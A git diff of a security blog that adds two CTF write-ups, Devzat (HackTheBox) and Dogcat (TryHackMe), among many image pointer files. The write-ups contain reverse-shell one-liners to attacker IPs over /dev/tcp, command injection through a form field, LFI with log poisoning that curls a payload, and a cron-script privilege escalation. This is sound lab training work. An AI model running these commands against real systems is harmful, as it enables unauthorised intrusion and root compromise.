b/content/writeup-ctf/writeup-devzat-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e597451e0f33cc0647f2e3d266721395ebc57058158de8e57320715b8e761e94 +size 29406 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-4.png b/content/writeup-ctf/writeup-devzat-htb/img/image-4.png new file mode 100644 index 0000000..3eb814b --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4d017e9e387f25cc50461ff915ffd5b58d5c95a79014a5df3dc44381d47a6e49 +size 31756 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-4.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-4.webp new file mode 100644 index 0000000..949b6e5 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:549ae04c6d83f21db0fcb9379a4911a393738140e18ad3288ba2b8a3ee669ab5 +size 55338 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-5.png b/content/writeup-ctf/writeup-devzat-htb/img/image-5.png new file mode 100644 index 0000000..0e40623 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6af03fb670e13eb06015ea3bb8a545ac2be1feacd2eda8d0ac307e151bdc1266 +size 77999 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-5.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-5.webp new file mode 100644 index 0000000..54d572a --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2af9ce1232d1033bf6daf626ac924c57e1e397254a77687b92d9fdcf6d620c5b +size 53076 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-6.png b/content/writeup-ctf/writeup-devzat-htb/img/image-6.png new file mode 100644 index 0000000..0c135e5 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0e03eb0bd2ba5533425ad285d029c60d523eb6fbe71f0ede1b9dc31617d8d5a2 +size 54091 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-6.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-6.webp new file mode 100644 index 0000000..41ce839 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cff17375528b775737908e78f1afd8cc3b666073be1b52f2256c5e259360b641 +size 41722 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-7.png b/content/writeup-ctf/writeup-devzat-htb/img/image-7.png new file mode 100644 index 0000000..11047ec --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6dcd8cc512f224751f0489954f74d168225f86699d954f50d4a8ae26e449899b +size 97120 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-7.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-7.webp new file mode 100644 index 0000000..555270f --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5a784eb3e3f336abe458c2e14769712f50dd6d0a5a89d6999c0b7efb84465283 +size 58324 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-8.png b/content/writeup-ctf/writeup-devzat-htb/img/image-8.png new file mode 100644 index 0000000..2209e12 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5a6b48886942acdc19569caaad21a7d28f33e00e830035fc863d412fc24f7bea +size 75020 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-8.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-8.webp new file mode 100644 index 0000000..5f964f3 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1075d130b2afb91b26a69becb0791e2b3e60f42bda5ec76cc1c056c578de65f0 +size 54224 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-9.png b/content/writeup-ctf/writeup-devzat-htb/img/image-9.png new file mode 100644 index 0000000..dde00c3 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6fd133f931d2d00d2031d7fb34508400d41b211d583542f7ba2f9391e486acfd +size 7894 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-9.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-9.webp new file mode 100644 index 0000000..a2e00be --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c9c7113a4dbc290638d6ab88992721445a0576be7daae5b80ef8d5ce2f6f14cd +size 6450 diff --git a/content/writeup-ctf/writeup-devzat-htb/index.md b/content/writeup-ctf/writeup-devzat-htb/index.md new file mode 100644 index 0000000..a031604 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/index.md @@ -0,0 +1,207 @@ +--- +title: "Writeup - Devzat (HTB)" +date: 2022-03-15 +slug: "writeup-devzat-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Devzat](https://app.hackthebox.com/machines/Devzat) machine from  the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV 10.10.11.118 +``` +Three TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 8.2p1) +- 80/tcp : HTTP web server (Apache 2.4.41) +- 8000/tcp : SSH + +I add the domain to the /etc/hosts file: + + +```bash +10.10.11.118 devzat.htb +``` +I then access the site via a browser: + +![](img/image-2.webp) + +## Exploit + +After looking at the site I notice that a shell command is given as an example at the bottom of the page: + + +```bash +ssh -l [user_name] devzat.htb -p 8000 +``` +This command connects to the application hosted on port 8000. + +![](img/image-3.webp) + +This application is an interactive chat with a number of commands available: + +![](img/image-4.webp) + +Nothing particular for the moment. I make a directory scan on the site. For that I use "ffuf" with the wordlist [common.txt](http://ffuf.me/wordlists). + + +```bash +ffuf -c -u http://devzat.htb/FUZZ -w Documents/commun.txt +``` +![](img/image-5.webp) + +Several folders but quite classic one. Now let's scan the subdomains: + + +```bash +ffuf -c -u http://devzat.htb -w Documents/sub.txt -H "Host: FUZZ.devzat.htb" -fw 18 +``` +![](img/image-6.webp) + +A subdomain is found ! I add it in the /etc/hosts file then I go to the site : + +![](img/image-7.webp) + +It is a web page with a formulary to add pets. Now let's scan the folders for this subdomain. + +![](img/image-8.webp) + +This is a git project with a number of files. + +![](img/image-9.webp) + +I will download the projects with the following command: + + +```bash +wget -r -np -R "index.html*" http://pets.devzat.htb/.git +``` +I first check the last commit to see if any files have been modified or deleted: + +![](img/image-10.webp) + +And indeed a large number of files have been deleted, so I will restore the last commit with the following command: + + +```bash +git checkout -- . +``` +![](img/image-11.webp) + +Now that we have the complete tree, let's start the code analysis. Let's start with main.go. + +I find in this file, a function related to the loading of the character of the pet animal. This function takes as argument the species. It then executes a "sh" command which retrieves the content of one of the files contained in the "characteristics" folder. We will be able to use this function to execute some code. + +![](img/image-12.webp) + +For that I make a classic request that I intersperse with Burp. + +![](img/image-13.webp) + +Then I modify the value of "species" to insert my code. I test at first a classical reverse shell, but without success. + +![](img/image-14.webp) + +Let's try to convert our command to Base64 to ensure that there is no modification before execution on the target machine. + +[Reverse Shells - Pentest Book](https://pentestbook.six2dez.com/exploitation/reverse-shells) + +For that I use the following command to encode my reverse shell command in base64. + + +```bash +echo "bash -i >& /dev/tcp/10.10.16.2/1234 0>&1" | base64 +``` +Then I transmit the following order in the form. + + +```bash +echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4yLzEyMzQgMD4mMQo=' | base64 -d | bash +``` +Bingo, I am now connected as Patrick. + +![](img/image-15.webp) + +No change it's not this user who has the first flag. I will have to find a way to change the user. To start, I'll run the [linPeas](http://linpeas.sh) script to get an overview of the machine. + +The first thing that catches my attention is the number of open ports. + +![](img/image-16.webp) + +Indeed there are a number of ports open only locally on the machine. So I will do an ssh port forwarding. + + +```bash +ssh -L 8086:127.0.0.1:8086 -N patrick@10.10.11.118 +``` +I can then perform an nmap scan on my local address to identify the service running on port 8086. + +![](img/image-17.webp) + +It is the InfluxDB service in version 1.7.5 that runs on this port. Let's look for an exploit... + +After some research I found the CVE-2019-20933. It is an exploit that allows to get an admin access to the database without using a password. I use the following script: + +{{< github repo="LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933" >}} + +I will now be able to search for information in the different databases. At first I look for the registered users : + +![](img/image-19.webp) + +I find the user "catherine" with her password. This is a very good news, indeed it is her who has the first flag. + +![](img/image-20.webp) + +I connect with ssh, then I get the flag. + +## Privilege escalation + +In the linPeas scan result I also noticed that a "devchat" service was running with patrick rights. It looks like a test version running on port 8443 in parallel with the production version. + + +```bash +catherine@devzat:~/dev/dev$ ps aux | grep dev +[...] +patrick 839 0.0 0.5 1085916 11904 ? Sl 12:28 0:00 ./devchat +[...] +``` +I also found backup files related to this same service: + +![](img/image-21.webp) + +These are files belonging to catherine, good news I will be able to recover them and analyze them to find an exploit. + +In the file "commands.go", I quickly find that the command /file uses a password to work. And this password is clearly indicated. + +![](img/image-22.webp) + +Ok let's try the different things we discovered. + +I log back in as patrick, then start a local SSH session on 8443. + +![](img/image-23.webp) + +Let's try to read a root file with the command /file and with the password found previously. I test with the file id\_rsa of the user root. + +![](img/image-24.webp) + +It works! So now I can connect as root with ssh. Then get the last flag. + +![](img/image-25.webp) + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Do not leave .git accessible on a website +- Do not use shell commands in functions used by forms accessible on a web site +- Do not store non-hasher passwords in a database +- Update InfluxDB +- Do not run the chat bot with root privileges diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-1.png b/content/writeup-ctf/writeup-dogcat-thm/img/image-1.png new file mode 100644 index 0000000..c995304 --- /dev/null +++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c537e42185f47b0030de10d9a4e55d61ed17a9f3183748cd9a7929e3fffaa729 +size 36714 diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-1.webp b/content/writeup-ctf/writeup-dogcat-thm/img/image-1.webp new file mode 100644 index 0000000..7010d0d --- /dev/null +++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bd2f41ce8a5db7c98db516e42cc459943190b2211853b404b6330fa0d692238d +size 35514 diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-2.png b/content/writeup-ctf/writeup-dogcat-thm/img/image-2.png new file mode 100644 index 0000000..5ad0a48 --- /dev/null +++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cb6aff75e49f9b6ea869b9b268c822957a870918ec8e5c5953c49e9a6b71c0f2 +size 23289 diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-2.webp b/content/writeup-ctf/writeup-dogcat-thm/img/image-2.webp new file mode 100644 index 0000000..b66e290 --- /dev/null +++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b79dc9c19e3a2bcab18fad644001c3409f8d583f985ea08c917624fe2c76816f +size 9824 diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-3.png b/content/writeup-ctf/writeup-dogcat-thm/img/image-3.png new file mode 100644 index 0000000..5576df5 --- /dev/null +++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ba66ebd4cb439e8c4955d7ba9f95243fe9fa2920c732dff1839e4c189209203a +size 80165 diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-3.webp b/content/writeup-ctf/writeup-dogcat-thm/img/image-3.webp new file mode 100644 index 0000000..ffec38e --- /dev/null +++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8b51c72dd0451545949d7b0121ecc3e8153e97c675fe6dc5c0eaafe2e45402d9 +size 74100 diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-4.png b/content/writeup-ctf/writeup-dogcat-thm/img/image-4.png new file mode 100644 index 0000000..99d654d --- /dev/null +++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0d03f3b22b5a3cb01aa64b3ac87ed16b3d4b52fa4fcd264e76d9404c3357772a +size 23323 diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-4.webp b/content/writeup-ctf/writeup-dogcat-thm/img/image-4.webp new file mode 100644 index 0000000..9d01c0f --- /dev/null +++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b47d8191354140344becc1626a2ce0a20c732c817173718c70b9bc5f24118300 +size 27870 diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-5.png b/content/writeup-ctf/writeup-dogcat-thm/img/image-5.png new file mode 100644 index 0000000..f12961a --- /dev/null +++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bc129cd34f622d63efc12c8f31d111b083fd2ce698f6bf9321fa266b01c24229 +size 41689 diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-5.webp b/content/writeup-ctf/writeup-dogcat-thm/img/image-5.webp new file mode 100644 index 0000000..2c1ae7a --- /dev/null +++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2078f2d76ba091430f4ec8e2fe6a0dbb82b6c71df4aa3c89976e52479f939f29 +size 36090 diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-6.png b/content/writeup-ctf/writeup-dogcat-thm/img/image-6.png new file mode 100644 index 0000000..72935ff --- /dev/null +++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:602120665ac19e728ba032a0299e8204bae06908ab50c936e1600984270c1767 +size 15887 diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-6.webp b/content/writeup-ctf/writeup-dogcat-thm/img/image-6.webp new file mode 100644 index 0000000..869d321 --- /dev/null +++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:785b31948744b4e4910114c1b3766249092b365bae26aa503813803957c2264c +size 15034 diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-7.png b/content/writeup-ctf/writeup-dogcat-thm/img/image-7.png new file mode 100644 index 0000000..3df38d0 --- /dev/null +++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7705333e8bff8b3e09b5921690a95aa71847809b1520b7a6da53bf0cf175d4c8 +size 3561 diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-7.webp b/content/writeup-ctf/writeup-dogcat-thm/img/image-7.webp new file mode 100644 index 0000000..5e4784a --- /dev/null +++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dee0258433c1946f75ea17a024ced6b27a243ebac4911ad9e23ffb1dac49e2a0 +size 3924 diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-8.png b/content/writeup-ctf/writeup-dogcat-thm/img/image-8.png new file mode 100644 index 0000000..a8bcc06 --- /dev/null +++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:974e0be2e0f951c88474f6cd13b9f0c5bd4b8544322438ee264f2bb1d45c7991 +size 14703 diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-8.webp b/content/writeup-ctf/writeup-dogcat-thm/img/image-8.webp new file mode 100644 index 0000000..c2f61e0 --- /dev/null +++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5d4f8ba6a97c92572673e9862cc691c6e1bb5873789d4de1c42bfb45a699a1fd +size 12934 diff --git a/content/writeup-ctf/writeup-dogcat-thm/index.md b/content/writeup-ctf/writeup-dogcat-thm/index.md new file mode 100644 index 0000000..c9b1202 --- /dev/null +++ b/content/writeup-ctf/writeup-dogcat-thm/index.md @@ -0,0 +1,194 @@ +--- +title: "Writeup - Dogcat (THM)" +date: 2022-05-31 +slug: "writeup-dogcat-thm" +type: "writeup-ctf" +--- + +This is a writeup for the [Dogcat](https://tryhackme.com/room/dogcat) machine from the TryHackMe site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.11.146 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 7.6p1) +- 80/tcp : HTTP web server (Apache 2.4.38) + +![](img/image-2.webp) + +## Exploit + +In a first step I start by making a scan of the website folders: + +![](img/image-3.webp) + +We find a page `cat.php`, it is surely the page which provides the random images of cat. With a little deduction I find a similar page: `dog.php`. + +I notice the use of an argument when I click on one of the buttons. So I try a Local-Remote File Inclusion, but without success. An error tells us that the options are: `dog` & `cat`. + +After some research I find the following page: [PHP Base64 Filter](https://blog.clever-age.com/fr/2014/10/21/owasp-local-remote-file-inclusion-lfi-rfi/). These are techniques to bypass security checks for Local-Remote File Inclusion. I try the version using a PHP filter: + + +```bash +http://10.10.91.89/?view=php://filter/read=convert.base64-encode/resource=cat/../index +``` +I get the contents of the index file encoded in base64 : + + +```bash + + + + + dogcat + + + + +

dogcat

+ a gallery of various dogs or cats + +
+

What would you like to see?

+
+ +
+ + + +``` +I can also use the same principle to get the content of the `flag.php` flag. + + +```bash +┌──(d3vyce㉿kali)-[~/Documents] +└─$ echo "PD9waHAKJGZsYWdfMSA9ICJUSE17VGgxc18xc19OMHRfNF9DYXRkb2dfYWI2N2VkZmF9Igo/Pgo=" | base64 -d + +``` +Pour faire une injection de commande //TODO + +![](img/image-4.webp) + + +```bash +[11/May/2022:12:26:50 +0000] "GET /?view=php://filter/read=convert.base64-encode/resource=cat/../../../../etc/passwd&ext&test=id HTTP/1.1" 400 0 "-" "uid=33(www-data) gid=33(www-data) groups=33(www-data) " +``` + +```bash +http://10.10.91.89/?view=php://filter/resource=cat/../../../../../var/log/apache2/access.log&ext&test=curl%2010.8.3.186:80/reverse.php%20%3E%20reverse.php +``` +![](img/image-5.webp) + +I now have a reverse shell as `www-data`. + + +```bash +$ cd /var/www +$ ls +flag2_QMW7JvaY2LvK.txt +html +$ cat flag2_QMW7JvaY2LvK.txt +THM{LF1_t0_RC3_aec3fb} +``` +I can get the second flag. + +## Privilege escalation + +I start by checking the sudo permissions of my user : + +![](img/image-6.webp) + +I have the permission to run the `env` command as `root`. So I look on GTFObin to see if there is a possibility to launch a shell with this command: [env sudo](https://gtfobins.github.io/gtfobins/env/#sudo). + +With the following command I create a `root` shell. + +![](img/image-7.webp) + + +```bash +cd /root +ls +flag3.txt +cat flag3.txt +THM{D1ff3r3nt_3nv1ronments_874112} +``` +I can get the third flag. After some research I notice a `dockerenv` file. So we are in a docker and I will have to find a way to get out to get the last flag. + + +```bash +ls -la +total 80 +drwxr-xr-x 1 root root 4096 May 11 11:59 . +drwxr-xr-x 1 root root 4096 May 11 11:59 .. +-rwxr-xr-x 1 root root 0 May 11 11:59 .dockerenv +drwxr-xr-x 1 root root 4096 Feb 26 2020 bin +drwxr-xr-x 2 root root 4096 Feb 1 2020 boot +drwxr-xr-x 5 root root 340 May 11 11:59 dev +drwxr-xr-x 1 root root 4096 May 11 11:59 etc +drwxr-xr-x 2 root root 4096 Feb 1 2020 home +drwxr-xr-x 1 root root 4096 Feb 26 2020 lib +drwxr-xr-x 2 root root 4096 Feb 24 2020 lib64 +drwxr-xr-x 2 root root 4096 Feb 24 2020 media +drwxr-xr-x 2 root root 4096 Feb 24 2020 mnt +drwxr-xr-x 1 root root 4096 May 11 11:59 opt +dr-xr-xr-x 112 root root 0 May 11 11:59 proc +drwx------ 1 root root 4096 Mar 10 2020 root +drwxr-xr-x 1 root root 4096 Feb 26 2020 run +drwxr-xr-x 1 root root 4096 Feb 26 2020 sbin +drwxr-xr-x 2 root root 4096 Feb 24 2020 srv +dr-xr-xr-x 13 root root 0 May 11 11:59 sys +drwxrwxrwt 1 root root 4096 Mar 10 2020 tmp +drwxr-xr-x 1 root root 4096 Feb 24 2020 usr +drwxr-xr-x 1 root root 4096 Feb 26 2020 var +ls /otp +ls: cannot access '/otp': No such file or directory +ls /opt +backups +``` +In the `/opt` folder I find a `backups` file with the following content: + + +```bash +#!/bin/bash +tar cf /root/container/backup/backup.tar /root/container +``` +backup.shIt is most certainly a script that runs regularly with a CRON job. Knowing that I can write to the file, I add the following line: + + +```bash +echo "bash -i >& /dev/tcp/10.8.3.186/2345 0>&1" >> backup.sh +``` +After a few seconds, I have a reverse shell as root but on the machine and not in a docker. + +![](img/image-8.webp) + +I can now recover the last flag. + + +```bash +# cat /root/flag4.txt +THM{esc4l4tions_on_esc4l4tions_on_esc4l4tions_7a52b17dba6ebb0dc38bc1049bcba02d} +``` diff --git a/content/writeup-ctf/writeup-goodgames-htb/featured.png b/content/writeup-ctf/writeup-goodgames-htb/featured.png new file mode 100644 index 0000000..c8a79fd --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:93ad7743716d5a2111781d1693ed8dba44bcbf87c9dfcd21e3129812996f8898 +size 216815 diff --git a/content/writeup-ctf/writeup-goodgames-htb/featured.webp b/content/writeup-ctf/writeup-goodgames-htb/featured.webp new file mode 100644 index 0000000..ead7b47 --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9ecf6bb749e53274e4278deab7c934b40b46c02a13b2893c2a6571e89dbfaff3 +size 23672 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-1.png b/content/writeup-ctf/writeup-goodgames-htb/img/image-1.png new file mode 100644 index 0000000..bba9c09 --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cd4f81a0a34cc625e0bcf0dc64d6667f8ea72ff484f54d663741b61cbbb473cc +size 29623 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-1.webp b/content/writeup-ctf/writeup-goodgames-htb/img/image-1.webp new file mode 100644 index 0000000..2144e9e --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f5e3dcdcc7000ed7a77ffd0e429d4a65a161426ddafd8eec502af81b39efcc07 +size 25288 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-10.png b/content/writeup-ctf/writeup-goodgames-htb/img/image-10.png new file mode 100644 index 0000000..11380df --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:09b46e56b3b2b045c28cac337ef0892e8f741a1c04c817f51c28ac7aa35b8bcd +size 18157 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-10.webp b/content/writeup-ctf/writeup-goodgames-htb/img/image-10.webp new file mode 100644 index 0000000..1da70a1 --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3fcace92c84da7c5fd0dcc8f031c18fde7c53c348fcd064fc5cddea2aa5f1d57 +size 24760 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-2.png b/content/writeup-ctf/writeup-goodgames-htb/img/image-2.png new file mode 100644 index 0000000..3cdac76 --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6255c03d2f289deef4101cc0f019786417e15673e3e2e1d4a84c3bfce1910884 +size 2224574 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-2.webp b/content/writeup-ctf/writeup-goodgames-htb/img/image-2.webp new file mode 100644 index 0000000..a32b33e --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:025e2dab54af4d3a4681631daf38e3fdf3e36017103122734ac862cd92af07d7 +size 271744 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-3.png b/content/writeup-ctf/writeup-goodgames-htb/img/image-3.png new file mode 100644 index 0000000..8cd27c1 --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9656e1a97c547a3b65c0ee67429e6d98393123e7dbf41e25a4c184c391b4690b +size 63946 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-3.webp b/content/writeup-ctf/writeup-goodgames-htb/img/image-3.webp new file mode 100644 index 0000000..5c98b8c --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:12cdeddfc582b0cf1d74bf5b6e166940cd040d250b62c181e75c499d2d6cdc72 +size 54056 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-4.png b/content/writeup-ctf/writeup-goodgames-htb/img/image-4.png new file mode 100644 index 0000000..ebc18b6 --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2cd71268f53543bfadfe3ddb6f1f0437a1b04525c56b80ab57ddf5b27462f6dc +size 33138 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-4.webp b/content/writeup-ctf/writeup-goodgames-htb/img/image-4.webp new file mode 100644 index 0000000..0783a6c --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cecedee0998e4323c973e7092970fba07316b43b89aff266d26003577e076e23 +size 29376 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-5.png b/content/writeup-ctf/writeup-goodgames-htb/img/image-5.png new file mode 100644 index 0000000..654df92 --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4064ccba607fe2db158e2868fc68b7468b529fdce9f260166e0a6f46d5491370 +size 24836 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-5.webp b/content/writeup-ctf/writeup-goodgames-htb/img/image-5.webp new file mode 100644 index 0000000..b83bc70 --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8182b28337e3741d694527431b83910f7695decd6252611985d91b8e0b8ff478 +size 13588 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-6.png b/content/writeup-ctf/writeup-goodgames-htb/img/image-6.png new file mode 100644 index 0000000..dfd7610 --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9fbbcf3b2fc788befc7f070348bfaf82a4d5e4b51c30f1c670271ac3e73b7376 +size 16933 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-6.webp b/content/writeup-ctf/writeup-goodgames-htb/img/image-6.webp new file mode 100644 index 0000000..dc6b234 --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cff9acbf41bb0206ec3f7dd7df781c1763954c095edecb4888dd61f5be07179a +size 19514 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-7.png b/content/writeup-ctf/writeup-goodgames-htb/img/image-7.png new file mode 100644 index 0000000..d90cd8f --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7f41812dce889551aea7341503008caf65d9c610690589269ceb36f3f914d1ce +size 32664 diff --git 